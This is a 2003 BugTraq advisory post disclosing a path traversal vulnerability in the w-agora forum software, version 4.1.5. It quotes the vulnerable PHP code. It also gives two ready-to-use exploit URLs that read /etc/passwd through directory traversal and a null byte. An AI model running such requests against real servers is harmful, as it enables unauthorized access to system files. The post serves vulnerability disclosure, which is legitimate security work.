BugTraq
Bug in w-agora Jan 12 2003 03:03PM
sonyy 2vias com ar (1 replies)
=======================
==Shell Security Team==
=======================

==============================
====Advisory For W-agora======
==============================

- Product : w-agora
- Tested version : version 4.1.5
- Website : http://www.w-agora.net
- Discovery By Sonyy
- Vendor Status: informed
- Problem : A security vulnerability in W-agora

The bug :
==========

index.php

if (empty($bn)) {
# No forum selected -> default to 'site' configuration
$site = empty($site) ? "agora" : $site;

$cfg_file = "${cfg_dir}/site_${site}.${ext}";
$expnd = "all";
} else {
$cfg_file = "${cfg_dir}/${bn}.${ext}";
}

Exploit :
=========

index.php

http://www.w-agora.net/current/index.php?site=demos&bn=../../../../../..
/../../../../etc/passwd%00

And modules.php

http://www.w-agora.net/current/modules.php?mod=fm&file=../../../../../..
/../../../../etc/passwd%00&bn=fm_d1

Any Question :
==============

Sonyy --> Sonico60 (at) hotmail (dot) com [email concealed]

[ reply ]
Re: Bug in w-agora Jan 15 2003 11:07PM
Nicob (nicob nicob net) (1 replies)
Re: Bug in w-agora Jan 18 2003 01:07AM
Ian Clelland (ian veryfresh com)


 

Privacy Statement
Copyright 2010, SecurityFocus